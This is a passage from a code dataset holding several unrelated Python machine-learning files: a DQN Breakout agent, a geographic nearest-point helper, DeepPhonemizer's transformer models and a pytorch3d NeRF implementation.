classical convolutional neural network with three convolutional layers,\n    followed by two fully connected layers. People familiar with object recognition\n    networks may notice that there are no pooling layers. But if you really think\n    about that, then pooling layers buy you a translation invariance – the network\n    becomes insensitive to the location of an object in the image. That makes\n    perfect sense for a classification task like ImageNet, but for games, the location\n    of the ball is crucial in determining the potential reward and we wouldn't want\n    to discard this information!\n\n    http://neuro.cs.ut.ee/demystifying-deep-reinforcement-learning/\n    \"\"\"\n\n    def __init__(self, name, state_shape, n_actions, epsilon=0, reuse=False):\n        with tf.variable_scope(name, reuse=reuse):\n            network = keras.models.Sequential()\n            network.add(Conv2D(16, (3, 3), strides=2, activation='relu', input_shape=state_shape))\n            network.add(Conv2D(32, (3, 3), strides=2, activation='relu'))\n            network.add(Conv2D(64, (3, 3), strides=2, activation='relu'))\n            network.add(Flatten())\n            network.add(Dense(256, activation='relu'))\n            network.add(Dense(n_actions, activation='linear'))\n            self.network = network\n            self.n_actions = n_actions  # needed by the shape assertion below\n            self.state_t = tf.placeholder('float32', [None,] + list(state_shape))\n            self.q_values_t = self.get_symbolic_q_values(self.state_t)\n\n        self.weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)\n        self.epsilon = epsilon\n\n    def get_symbolic_q_values(self, state_t):\n        \"\"\" Takes agent's observation, returns Q-values. Both are tf tensors. \"\"\"\n        q_values = self.network(state_t)\n\n        assert tf.is_numeric_tensor(q_values) and q_values.shape.ndims == 2, \\\n            'Please return 2D tf tensor of Q-values, got %s' % repr(q_values)\n        assert int(q_values.shape[1]) == self.n_actions\n\n        return q_values\n\n    def get_q_values(self, state_t):\n        \"\"\" Same as symbolic step except operates on numpy arrays \"\"\"\n        sess = tf.get_default_session()\n        return sess.run(self.q_values_t, {self.state_t: state_t})\n\n    def sample_actions(self, q_values):\n        \"\"\" Pick actions given Q-values. Uses epsilon-greedy exploration strategy. 
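For example (illustrative addition, `agent` stands for any DQNAgent instance): with epsilon=0 the policy is fully greedy:\n\n        >>> q_values = np.array([[0.1, 0.9], [0.8, 0.2]])\n        >>> agent.epsilon = 0.0\n        >>> agent.sample_actions(q_values)\n        array([1, 0])\n        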
\"\"\"\n epsilon = self.epsilon\n batch_size, n_actions = q_values.shape\n random_actions = np.random.choice(n_actions, size=batch_size)\n best_actions = q_values.argmax(axis=-1)\n should_explore = np.random.choice([0, 1], batch_size, p=[1 - epsilon, epsilon])\n return np.where(should_explore, random_actions, best_actions)\n\n\nclass PreprocessAtariImage(ObservationWrapper):\n\n def __init__(self, env):\n super().__init__(env)\n self.img_size = (64, 64)\n self.observation_space = Box(0.0, 1.0, (self.img_size[0], self.img_size[1], 1))\n\n def _observation(self, img):\n img = img[34:-16, :, :]\n img = imresize(img, self.img_size)\n img = img.mean(-1, keepdims=True)\n img = img.astype('float32')\n img /= 255.\n return img\n","repo_name":"markmo/dltemplate","sub_path":"src/rl/dqn_breakout/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"10057748912","text":"import numpy as np\nfrom scipy.spatial import cKDTree\n\n# def calculate_true_lon_lat(ds):\n# dvars = ds.variables\n# rlon = dvars[\"rlon\"]\n# rlat = dvars[\"rlat\"]\n# proj = dvars[\"projection_ob_tran\"]\n# rlon, rlat = np.meshgrid(rlon, rlat, sparse=False, indexing=\"ij\")\n# tf = pyproj.Transformer.from_crs(proj.proj4, \"epsg:4326\", always_xy=True)\n# # pylint: disable=unpacking-non-sequence\n# lon, lat = tf.transform(rlon, rlat)\n# return lon, lat\n\n\n\ndef nearest(lat,lon, lat_pos, lon_pos):\n \"\"\"Function to find index to nearest point \"\"\"\n M = np.c_[np.ravel(lon), np.ravel(lat)]\n tree = cKDTree(M)\n _, ii = tree.query([lon_pos, lat_pos], k=1)\n idy, idx = np.where((lon == M[ii][0]) & (lat == M[ii][1]))\n return int(idx), int(idy)\n","repo_name":"SINTEF/blues-metocean-lib","sub_path":"src/bluesmet/common/latlon.py","file_name":"latlon.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12859203682","text":"from abc import ABC, abstractmethod\nfrom enum import Enum\nfrom typing import Tuple, Dict, Any\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import TransformerEncoderLayer, LayerNorm, TransformerEncoder\n\nfrom dp.model.utils import get_dedup_tokens, _make_len_mask, _generate_square_subsequent_mask, PositionalEncoding\nfrom dp.preprocessing.text import Preprocessor\n\n\nclass ModelType(Enum):\n TRANSFORMER = 'transformer'\n AUTOREG_TRANSFORMER = 'autoreg_transformer'\n\n def is_autoregressive(self) -> bool:\n \"\"\"\n Returns: bool: Whether the model is autoregressive.\n \"\"\"\n return self in {ModelType.AUTOREG_TRANSFORMER}\n\n\nclass Model(torch.nn.Module, ABC):\n\n def __init__(self):\n super().__init__()\n\n @abstractmethod\n def generate(self, batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Generates phonemes for a text batch\n\n Args:\n batch (Dict[str, torch.Tensor]): Dictionary containing 'text' (tokenized text tensor),\n 'text_len' (text length tensor),\n 'start_index' (phoneme start indices for AutoregressiveTransformer)\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: The predictions. 
The first element is a tensor (phoneme tokens)\n                                               and the second element is a tensor (phoneme token probabilities)\n        \"\"\"\n        pass\n\n\nclass ForwardTransformer(Model):\n\n    def __init__(self,\n                 encoder_vocab_size: int,\n                 decoder_vocab_size: int,\n                 d_model=512,\n                 d_fft=1024,\n                 layers=4,\n                 dropout=0.1,\n                 heads=1) -> None:\n        super().__init__()\n\n        self.d_model = d_model\n\n        self.embedding = nn.Embedding(encoder_vocab_size, d_model)\n        self.pos_encoder = PositionalEncoding(d_model, dropout)\n\n        encoder_layer = TransformerEncoderLayer(d_model=d_model,\n                                                nhead=heads,\n                                                dim_feedforward=d_fft,\n                                                dropout=dropout,\n                                                activation='relu')\n        encoder_norm = LayerNorm(d_model)\n        self.encoder = TransformerEncoder(encoder_layer=encoder_layer,\n                                          num_layers=layers,\n                                          norm=encoder_norm)\n\n        self.fc_out = nn.Linear(d_model, decoder_vocab_size)\n\n    def forward(self,\n                batch: Dict[str, torch.Tensor]) -> torch.Tensor:         # shape: [N, T]\n        \"\"\"\n        Forward pass of the model on a data batch.\n\n        Args:\n            batch (Dict[str, torch.Tensor]): Input batch entry 'text' (text tensor).\n\n        Returns:\n            Tensor: Predictions.\n        \"\"\"\n\n        x = batch['text']\n        x = x.transpose(0, 1)        # shape: [T, N]\n        src_pad_mask = _make_len_mask(x).to(x.device)\n        x = self.embedding(x)\n        x = self.pos_encoder(x)\n        x = self.encoder(x, src_key_padding_mask=src_pad_mask)\n        x = self.fc_out(x)\n        x = x.transpose(0, 1)\n        return x\n\n    @torch.jit.export\n    def generate(self,\n                 batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:\n        \"\"\"\n        Inference pass on a batch of tokenized texts.\n\n        Args:\n            batch (Dict[str, torch.Tensor]): Input batch with entry 'text' (text tensor).\n\n        Returns:\n            Tuple: The first element is a Tensor (phoneme tokens) and the second element\n                   is a tensor (phoneme token probabilities).\n        \"\"\"\n\n        with torch.no_grad():\n            x = self.forward(batch)\n        tokens, logits = get_dedup_tokens(x)\n        return tokens, logits\n\n    @classmethod\n    def from_config(cls, config: dict) -> 'ForwardTransformer':\n        preprocessor = Preprocessor.from_config(config)\n        return ForwardTransformer(\n            encoder_vocab_size=preprocessor.text_tokenizer.vocab_size,\n            decoder_vocab_size=preprocessor.phoneme_tokenizer.vocab_size,\n            d_model=config['model']['d_model'],\n            d_fft=config['model']['d_fft'],\n            layers=config['model']['layers'],\n            dropout=config['model']['dropout'],\n            heads=config['model']['heads']\n        )\n\n\nclass AutoregressiveTransformer(Model):\n\n    def __init__(self,\n                 encoder_vocab_size: int,\n                 decoder_vocab_size: int,\n                 end_index: int,\n                 d_model=512,\n                 d_fft=1024,\n                 encoder_layers=4,\n                 decoder_layers=4,\n                 dropout=0.1,\n                 heads=1):\n        super().__init__()\n\n        self.end_index = end_index\n        self.d_model = d_model\n        self.encoder = nn.Embedding(encoder_vocab_size, d_model)\n        self.pos_encoder = PositionalEncoding(d_model, dropout)\n        self.decoder = nn.Embedding(decoder_vocab_size, d_model)\n        self.pos_decoder = PositionalEncoding(d_model, dropout)\n        self.transformer = nn.Transformer(d_model=d_model, nhead=heads, num_encoder_layers=encoder_layers,\n                                          num_decoder_layers=decoder_layers, dim_feedforward=d_fft,\n                                          dropout=dropout, activation='relu')\n        self.fc_out = nn.Linear(d_model, decoder_vocab_size)\n\n    def forward(self, batch: Dict[str, torch.Tensor]):         # shape: [N, T]\n        \"\"\"\n        Forward pass of the model on a data batch.\n\n        Args:\n            batch (Dict[str, torch.Tensor]): Input batch with entries 'text' (text tensor) and 'phonemes'\n                                             (phoneme tensor for teacher forcing).\n\n        Returns:\n            Tensor: Predictions.\n        \"\"\"\n\n        src = batch['text']\n        trg = batch['phonemes'][:, :-1]\n\n        src = 
src.transpose(0, 1) # shape: [T, N]\n trg = trg.transpose(0, 1)\n\n trg_mask = _generate_square_subsequent_mask(len(trg)).to(trg.device)\n\n src_pad_mask = _make_len_mask(src).to(trg.device)\n trg_pad_mask = _make_len_mask(trg).to(trg.device)\n\n src = self.encoder(src)\n src = self.pos_encoder(src)\n\n trg = self.decoder(trg)\n trg = self.pos_decoder(trg)\n\n output = self.transformer(src, trg, src_mask=None, tgt_mask=trg_mask,\n memory_mask=None, src_key_padding_mask=src_pad_mask,\n tgt_key_padding_mask=trg_pad_mask, memory_key_padding_mask=src_pad_mask)\n output = self.fc_out(output)\n output = output.transpose(0, 1)\n return output\n\n @torch.jit.export\n def generate(self,\n batch: Dict[str, torch.Tensor],\n max_len: int = 100) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Inference pass on a batch of tokenized texts.\n\n Args:\n batch (Dict[str, torch.Tensor]): Dictionary containing the input to the model with entries 'text'\n and 'start_index'\n max_len (int): Max steps of the autoregressive inference loop.\n\n Returns:\n Tuple: Predictions. The first element is a Tensor of phoneme tokens and the second element\n is a Tensor of phoneme token probabilities.\n \"\"\"\n\n input = batch['text']\n start_index = batch['start_index']\n\n batch_size = input.size(0)\n input = input.transpose(0, 1) # shape: [T, N]\n src_pad_mask = _make_len_mask(input).to(input.device)\n with torch.no_grad():\n input = self.encoder(input)\n input = self.pos_encoder(input)\n input = self.transformer.encoder(input,\n src_key_padding_mask=src_pad_mask)\n out_indices = start_index.unsqueeze(0)\n out_logits = []\n for i in range(max_len):\n tgt_mask = _generate_square_subsequent_mask(i + 1).to(input.device)\n output = self.decoder(out_indices)\n output = self.pos_decoder(output)\n output = self.transformer.decoder(output,\n input,\n memory_key_padding_mask=src_pad_mask,\n tgt_mask=tgt_mask)\n output = self.fc_out(output) # shape: [T, N, V]\n out_tokens = output.argmax(2)[-1:, :]\n out_logits.append(output[-1:, :, :])\n\n out_indices = torch.cat([out_indices, out_tokens], dim=0)\n stop_rows, _ = torch.max(out_indices == self.end_index, dim=0)\n if torch.sum(stop_rows) == batch_size:\n break\n\n out_indices = out_indices.transpose(0, 1) # out shape [N, T]\n out_logits = torch.cat(out_logits, dim=0).transpose(0, 1) # out shape [N, T, V]\n out_logits = out_logits.softmax(-1)\n out_probs = torch.ones((out_indices.size(0), out_indices.size(1)))\n for i in range(out_indices.size(0)):\n for j in range(0, out_indices.size(1)-1):\n out_probs[i, j+1] = out_logits[i, j].max()\n return out_indices, out_probs\n\n @classmethod\n def from_config(cls, config: Dict[str, Any]) -> 'AutoregressiveTransformer':\n \"\"\"\n Initializes an autoregressive Transformer model from a config.\n Args:\n config (dict): Configuration containing the hyperparams.\n\n Returns:\n AutoregressiveTransformer: Model object.\n \"\"\"\n\n preprocessor = Preprocessor.from_config(config)\n return AutoregressiveTransformer(\n encoder_vocab_size=preprocessor.text_tokenizer.vocab_size,\n decoder_vocab_size=preprocessor.phoneme_tokenizer.vocab_size,\n end_index=preprocessor.phoneme_tokenizer.end_index,\n d_model=config['model']['d_model'],\n d_fft=config['model']['d_fft'],\n encoder_layers=config['model']['layers'],\n decoder_layers=config['model']['layers'],\n dropout=config['model']['dropout'],\n heads=config['model']['heads']\n )\n\n\ndef create_model(model_type: ModelType, config: Dict[str, Any]) -> Model:\n \"\"\"\n Initializes a model from a config for a 
given model type.\n\n    Args:\n        model_type (ModelType): Type of model to be initialized.\n        config (dict): Configuration containing hyperparams.\n\n    Returns: Model: Model object.\n    \"\"\"\n\n    if model_type is ModelType.TRANSFORMER:\n        model = ForwardTransformer.from_config(config)\n    elif model_type is ModelType.AUTOREG_TRANSFORMER:\n        model = AutoregressiveTransformer.from_config(config)\n    else:\n        raise ValueError(f'Unsupported model type: {model_type}. '\n                         f'Supported types: {[t.value for t in ModelType]}')\n    return model\n\n\ndef load_checkpoint(checkpoint_path: str, device: str = 'cpu') -> Tuple[Model, Dict[str, Any]]:\n    \"\"\"\n    Initializes a model from a checkpoint (.pt file).\n\n    Args:\n        checkpoint_path (str): Path to checkpoint file (.pt).\n        device (str): Device to put the model to ('cpu' or 'cuda').\n\n    Returns: Tuple: The first element is a Model (the loaded model)\n             and the second element is a dictionary (config).\n    \"\"\"\n\n    device = torch.device(device)\n    checkpoint = torch.load(checkpoint_path, map_location=device)\n    model_type = checkpoint['config']['model']['type']\n    model_type = ModelType(model_type)\n    model = create_model(model_type, config=checkpoint['config'])\n    model.load_state_dict(checkpoint['model'])\n    model.eval()\n    return model, checkpoint","repo_name":"as-ideas/DeepPhonemizer","sub_path":"dp/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11771,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"21"} +{"seq_id":"16296066121","text":"import math\nfrom typing import Optional, Tuple, List\n\nimport torch\nimport torch.nn.functional as F\nfrom pytorch3d.renderer import ImplicitRenderer, RayBundle, ray_bundle_to_ray_points, MonteCarloRaysampler, NDCGridRaysampler, EmissionAbsorptionRaymarcher\nfrom pytorch3d.renderer.cameras import CamerasBase\nfrom pytorch3d.renderer.implicit.sample_pdf import sample_pdf\nfrom pytorch3d.renderer.implicit.raymarching import (\n    _check_density_bounds,\n    _check_raymarcher_inputs,\n    _shifted_cumprod,\n)\nfrom pytorch3d.structures import Pointclouds\nfrom pytorch3d.vis.plotly_vis import plot_scene\nfrom visdom import Visdom\nfrom .utils import calc_mse, calc_psnr, sample_images_at_mc_locs\n\n\nclass LinearWithRepeat(torch.nn.Linear):\n    \"\"\"\n    if x has shape (..., k, n1)\n    and y has shape (..., n2)\n    then\n    LinearWithRepeat(n1 + n2, out_features).forward((x,y))\n    is equivalent to\n    Linear(n1 + n2, out_features).forward(\n        torch.cat([x, y.unsqueeze(-2).expand(..., k, n2)], dim=-1)\n    )\n\n    Or visually:\n    Given the following, for each ray,\n\n                feature   ->\n\n    ray         xxxxxxxx\n    position    xxxxxxxx\n    |           xxxxxxxx\n    v           xxxxxxxx\n\n\n    and\n                yyyyyyyy\n\n    where the y's do not depend on the position\n    but only on the ray,\n    we want to evaluate a Linear layer on both\n    types of data at every position.\n\n    It's as if we constructed\n\n                xxxxxxxxyyyyyyyy\n                xxxxxxxxyyyyyyyy\n                xxxxxxxxyyyyyyyy\n                xxxxxxxxyyyyyyyy\n\n    and sent that through the Linear.\n    \"\"\"\n\n    def forward(self, input: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:\n        n1 = input[0].shape[-1]\n        output1 = F.linear(input[0], self.weight[:, :n1], self.bias)\n        output2 = F.linear(input[1], self.weight[:, n1:], None)\n        return output1 + output2.unsqueeze(-2)\n\n\nclass HarmonicEmbedding(torch.nn.Module):\n    def __init__(\n        self,\n        n_harmonic_functions: int = 6,\n        omega0: float = 1.0,\n        logspace: bool = True,\n        include_input: bool = True,\n    ) -> None:\n        \"\"\"\n        Given an input tensor `x` of shape [minibatch, ... 
, dim],\n the harmonic embedding layer converts each feature\n in `x` into a series of harmonic features `embedding`,\n where for each i in range(dim) the following are present\n in embedding[...]:\n ```\n [\n sin(x[..., i]),\n sin(f_1*x[..., i]),\n sin(f_2*x[..., i]),\n ...\n sin(f_N * x[..., i]),\n cos(x[..., i]),\n cos(f_1*x[..., i]),\n cos(f_2*x[..., i]),\n ...\n cos(f_N * x[..., i]),\n x[..., i] # only present if include_input is True.\n ]\n ```\n where N corresponds to `n_harmonic_functions`, and f_i is a scalar\n denoting the i-th frequency of the harmonic embedding.\n The shape of the output is [minibatch, ... , dim * (2 * N + 1)] if\n include_input is True, otherwise [minibatch, ... , dim * (2 * N)].\n\n If `logspace==True`, the frequencies `[f_1, ..., f_N]` are\n powers of 2:\n `f_1 = 1, ..., f_N = 2**torch.arange(n_harmonic_functions)`\n\n If `logspace==False`, frequencies are linearly spaced between\n `1.0` and `2**(n_harmonic_functions-1)`:\n `f_1, ..., f_N = torch.linspace(\n 1.0, 2**(n_harmonic_functions-1), n_harmonic_functions\n )`\n\n Note that `x` is also premultiplied by the base frequency `omega0`\n before evaluating the harmonic functions.\n \"\"\"\n super().__init__()\n\n if logspace:\n frequencies = 2.0 ** torch.arange(\n n_harmonic_functions,\n dtype=torch.float32,\n )\n else:\n frequencies = torch.linspace(\n 1.0,\n 2.0 ** (n_harmonic_functions - 1),\n n_harmonic_functions,\n dtype=torch.float32,\n )\n\n try:\n self.register_buffer(\"_frequencies\", omega0 * frequencies, persistent=False)\n except TypeError:\n # workaround for pytorch<1.6\n self.register_buffer(\"_frequencies\", omega0 * frequencies)\n\n self.include_input = include_input\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: tensor of shape [..., dim]\n Returns:\n embedding: a harmonic embedding of `x` of shape\n [..., dim * (n_harmonic_functions * 2 + T)] where\n T is 1 if include_input is True and 0 otherwise.\n \"\"\"\n embed = (x[..., None] * self._frequencies).view(*x.shape[:-1], -1)\n if self.include_input:\n return torch.cat((embed.sin(), embed.cos(), x), dim=-1)\n else:\n return torch.cat((embed.sin(), embed.cos()), dim=-1)\n\n\ndef _xavier_init(linear):\n \"\"\"\n Performs the Xavier weight initialization of the linear layer `linear`.\n \"\"\"\n torch.nn.init.xavier_uniform_(linear.weight.data)\n\n\nclass NeuralRadianceField(torch.nn.Module):\n def __init__(\n self,\n n_harmonic_functions_xyz: int = 6,\n n_harmonic_functions_dir: int = 4,\n n_hidden_neurons_xyz: int = 256,\n n_hidden_neurons_dir: int = 128,\n n_layers_xyz: int = 8,\n append_xyz: Tuple[int] = (5,),\n use_multiple_streams: bool = True,\n **kwargs,\n ):\n \"\"\"\n Args:\n n_harmonic_functions_xyz: The number of harmonic functions\n used to form the harmonic embedding of 3D point locations.\n n_harmonic_functions_dir: The number of harmonic functions\n used to form the harmonic embedding of the ray directions.\n n_hidden_neurons_xyz: The number of hidden units in the\n fully connected layers of the MLP that accepts the 3D point\n locations and outputs the occupancy field with the intermediate\n features.\n n_hidden_neurons_dir: The number of hidden units in the\n fully connected layers of the MLP that accepts the intermediate\n features and ray directions and outputs the radiance field\n (per-point colors).\n n_layers_xyz: The number of layers of the MLP that outputs the\n occupancy field.\n append_xyz: The list of indices of the skip layers of the occupancy MLP.\n use_multiple_streams: Whether density 
and color should be calculated on\n separate CUDA streams.\n \"\"\"\n super().__init__()\n\n # The harmonic embedding layer converts input 3D coordinates\n # to a representation that is more suitable for\n # processing with a deep neural network.\n self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)\n self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)\n embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3\n embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3\n\n self.mlp_xyz = MLPWithInputSkips(\n n_layers_xyz,\n embedding_dim_xyz,\n n_hidden_neurons_xyz,\n embedding_dim_xyz,\n n_hidden_neurons_xyz,\n input_skips=append_xyz,\n )\n\n self.intermediate_linear = torch.nn.Linear(\n n_hidden_neurons_xyz, n_hidden_neurons_xyz\n )\n _xavier_init(self.intermediate_linear)\n\n self.density_layer = torch.nn.Linear(n_hidden_neurons_xyz, 1)\n _xavier_init(self.density_layer)\n\n # Zero the bias of the density layer to avoid\n # a completely transparent initialization.\n self.density_layer.bias.data[:] = 0.0 # fixme: Sometimes this is not enough\n\n self.color_layer = torch.nn.Sequential(\n LinearWithRepeat(\n n_hidden_neurons_xyz + embedding_dim_dir, n_hidden_neurons_dir\n ),\n torch.nn.ReLU(True),\n torch.nn.Linear(n_hidden_neurons_dir, 3),\n torch.nn.Sigmoid(),\n )\n self.use_multiple_streams = use_multiple_streams\n\n def _get_densities(\n self,\n features: torch.Tensor,\n depth_values: torch.Tensor,\n density_noise_std: float,\n ) -> torch.Tensor:\n \"\"\"\n This function takes `features` predicted by `self.mlp_xyz`\n and converts them to `raw_densities` with `self.density_layer`.\n `raw_densities` are later re-weighted using the depth step sizes\n and mapped to [0-1] range with 1 - inverse exponential of `raw_densities`.\n \"\"\"\n raw_densities = self.density_layer(features)\n deltas = torch.cat(\n (\n depth_values[..., 1:] - depth_values[..., :-1],\n 1e10 * torch.ones_like(depth_values[..., :1]),\n ),\n dim=-1,\n )[..., None]\n if density_noise_std > 0.0:\n raw_densities = (\n raw_densities + torch.randn_like(raw_densities) * density_noise_std\n )\n densities = 1 - (-deltas * torch.relu(raw_densities)).exp()\n return densities\n\n def _get_colors(\n self, features: torch.Tensor, rays_directions: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n This function takes per-point `features` predicted by `self.mlp_xyz`\n and evaluates the color model in order to attach to each\n point a 3D vector of its RGB color.\n \"\"\"\n # Normalize the ray_directions to unit l2 norm.\n rays_directions_normed = torch.nn.functional.normalize(rays_directions, dim=-1)\n\n # Obtain the harmonic embedding of the normalized ray directions.\n rays_embedding = self.harmonic_embedding_dir(rays_directions_normed)\n\n return self.color_layer((self.intermediate_linear(features), rays_embedding))\n\n def _get_densities_and_colors(\n self, features: torch.Tensor, ray_bundle: RayBundle, density_noise_std: float\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n The second part of the forward calculation.\n\n Args:\n features: the output of the common mlp (the prior part of the\n calculation), shape\n (minibatch x ... 
x self.n_hidden_neurons_xyz).\n ray_bundle: As for forward().\n density_noise_std: As for forward().\n\n Returns:\n rays_densities: A tensor of shape `(minibatch, ..., num_points_per_ray, 1)`\n denoting the opacity of each ray point.\n rays_colors: A tensor of shape `(minibatch, ..., num_points_per_ray, 3)`\n denoting the color of each ray point.\n \"\"\"\n if self.use_multiple_streams and features.is_cuda:\n current_stream = torch.cuda.current_stream(features.device)\n other_stream = torch.cuda.Stream(features.device)\n other_stream.wait_stream(current_stream)\n\n with torch.cuda.stream(other_stream):\n rays_densities = self._get_densities(\n features, ray_bundle.lengths, density_noise_std\n )\n # rays_densities.shape = [minibatch x ... x 1] in [0-1]\n\n rays_colors = self._get_colors(features, ray_bundle.directions)\n # rays_colors.shape = [minibatch x ... x 3] in [0-1]\n\n current_stream.wait_stream(other_stream)\n else:\n # Same calculation as above, just serial.\n rays_densities = self._get_densities(\n features, ray_bundle.lengths, density_noise_std\n )\n rays_colors = self._get_colors(features, ray_bundle.directions)\n return rays_densities, rays_colors\n\n def forward(\n self,\n ray_bundle: RayBundle,\n density_noise_std: float = 0.0,\n **kwargs,\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n The forward function accepts the parametrizations of\n 3D points sampled along projection rays. The forward\n pass is responsible for attaching a 3D vector\n and a 1D scalar representing the point's\n RGB color and opacity respectively.\n\n Args:\n ray_bundle: A RayBundle object containing the following variables:\n origins: A tensor of shape `(minibatch, ..., 3)` denoting the\n origins of the sampling rays in world coords.\n directions: A tensor of shape `(minibatch, ..., 3)`\n containing the direction vectors of sampling rays in world coords.\n lengths: A tensor of shape `(minibatch, ..., num_points_per_ray)`\n containing the lengths at which the rays are sampled.\n density_noise_std: A floating point value representing the\n variance of the random normal noise added to the output of\n the opacity function. This can prevent floating artifacts.\n\n Returns:\n rays_densities: A tensor of shape `(minibatch, ..., num_points_per_ray, 1)`\n denoting the opacity of each ray point.\n rays_colors: A tensor of shape `(minibatch, ..., num_points_per_ray, 3)`\n denoting the color of each ray point.\n \"\"\"\n # We first convert the ray parametrizations to world\n # coordinates with `ray_bundle_to_ray_points`.\n rays_points_world = ray_bundle_to_ray_points(ray_bundle)\n # rays_points_world.shape = [minibatch x ... x 3]\n\n # For each 3D world coordinate, we obtain its harmonic embedding.\n embeds_xyz = self.harmonic_embedding_xyz(rays_points_world)\n # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions*6 + 3]\n\n # self.mlp maps each harmonic embedding to a latent feature space.\n features = self.mlp_xyz(embeds_xyz, embeds_xyz)\n # features.shape = [minibatch x ... 
x self.n_hidden_neurons_xyz]\n\n rays_densities, rays_colors = self._get_densities_and_colors(\n features, ray_bundle, density_noise_std\n )\n return rays_densities, rays_colors\n\n\nclass MLPWithInputSkips(torch.nn.Module):\n \"\"\"\n Implements the multi-layer perceptron architecture of the Neural Radiance Field.\n\n As such, `MLPWithInputSkips` is a multi layer perceptron consisting\n of a sequence of linear layers with ReLU activations.\n\n Additionally, for a set of predefined layers `input_skips`, the forward pass\n appends a skip tensor `z` to the output of the preceding layer.\n\n Note that this follows the architecture described in the Supplementary\n Material (Fig. 7) of [1].\n\n References:\n [1] Ben Mildenhall and Pratul P. Srinivasan and Matthew Tancik\n and Jonathan T. Barron and Ravi Ramamoorthi and Ren Ng:\n NeRF: Representing Scenes as Neural Radiance Fields for View\n Synthesis, ECCV2020\n \"\"\"\n\n def __init__(\n self,\n n_layers: int,\n input_dim: int,\n output_dim: int,\n skip_dim: int,\n hidden_dim: int,\n input_skips: Tuple[int] = (),\n ):\n \"\"\"\n Args:\n n_layers: The number of linear layers of the MLP.\n input_dim: The number of channels of the input tensor.\n output_dim: The number of channels of the output.\n skip_dim: The number of channels of the tensor `z` appended when\n evaluating the skip layers.\n hidden_dim: The number of hidden units of the MLP.\n input_skips: The list of layer indices at which we append the skip\n tensor `z`.\n \"\"\"\n super().__init__()\n layers = []\n for layeri in range(n_layers):\n if layeri == 0:\n dimin = input_dim\n dimout = hidden_dim\n elif layeri in input_skips:\n dimin = hidden_dim + skip_dim\n dimout = hidden_dim\n else:\n dimin = hidden_dim\n dimout = hidden_dim\n linear = torch.nn.Linear(dimin, dimout)\n _xavier_init(linear)\n layers.append(torch.nn.Sequential(linear, torch.nn.ReLU(True)))\n self.mlp = torch.nn.ModuleList(layers)\n self._input_skips = set(input_skips)\n\n def forward(self, x: torch.Tensor, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: The input tensor of shape `(..., input_dim)`.\n z: The input skip tensor of shape `(..., skip_dim)` which is appended\n to layers whose indices are specified by `input_skips`.\n Returns:\n y: The output tensor of shape `(..., output_dim)`.\n \"\"\"\n y = x\n for li, layer in enumerate(self.mlp):\n if li in self._input_skips:\n y = torch.cat((y, z), dim=-1)\n y = layer(y)\n return y\n\n\nclass EmissionAbsorptionNeRFRaymarcher(EmissionAbsorptionRaymarcher):\n \"\"\"\n This is essentially the `pytorch3d.renderer.EmissionAbsorptionRaymarcher`\n which additionally returns the rendering weights. 
It also skips returning\n the computation of the alpha-mask which is, in case of NeRF, equal to 1\n everywhere.\n\n The weights are later used in the NeRF pipeline to carry out the importance\n ray-sampling for the fine rendering pass.\n\n For more details about the EmissionAbsorptionRaymarcher please refer to\n the documentation of `pytorch3d.renderer.EmissionAbsorptionRaymarcher`.\n \"\"\"\n\n def forward(\n self,\n rays_densities: torch.Tensor,\n rays_features: torch.Tensor,\n eps: float = 1e-10,\n **kwargs,\n ) -> torch.Tensor:\n \"\"\"\n Args:\n rays_densities: Per-ray density values represented with a tensor\n of shape `(..., n_points_per_ray, 1)` whose values range in [0, 1].\n rays_features: Per-ray feature values represented with a tensor\n of shape `(..., n_points_per_ray, feature_dim)`.\n eps: A lower bound added to `rays_densities` before computing\n the absorption function (cumprod of `1-rays_densities` along\n each ray). This prevents the cumprod to yield exact 0\n which would inhibit any gradient-based learning.\n\n Returns:\n features: A tensor of shape `(..., feature_dim)` containing\n the rendered features for each ray.\n weights: A tensor of shape `(..., n_points_per_ray)` containing\n the ray-specific emission-absorption distribution.\n Each ray distribution `(..., :)` is a valid probability\n distribution, i.e. it contains non-negative values that integrate\n to 1, such that `weights.sum(dim=-1)==1).all()` yields `True`.\n \"\"\"\n _check_raymarcher_inputs(\n rays_densities,\n rays_features,\n None,\n z_can_be_none=True,\n features_can_be_none=False,\n density_1d=True,\n )\n _check_density_bounds(rays_densities)\n rays_densities = rays_densities[..., 0]\n absorption = _shifted_cumprod(\n (1.0 + eps) - rays_densities, shift=self.surface_thickness\n )\n weights = rays_densities * absorption\n features = (weights[..., None] * rays_features).sum(dim=-2)\n\n return features, weights\n\n\nclass ProbabilisticRaysampler(torch.nn.Module):\n \"\"\"\n Implements the importance sampling of points along rays.\n The input is a `RayBundle` object with a `ray_weights` tensor\n which specifies the probabilities of sampling a point along each ray.\n\n This raysampler is used for the fine rendering pass of NeRF.\n As such, the forward pass accepts the RayBundle output by the\n raysampling of the coarse rendering pass. 
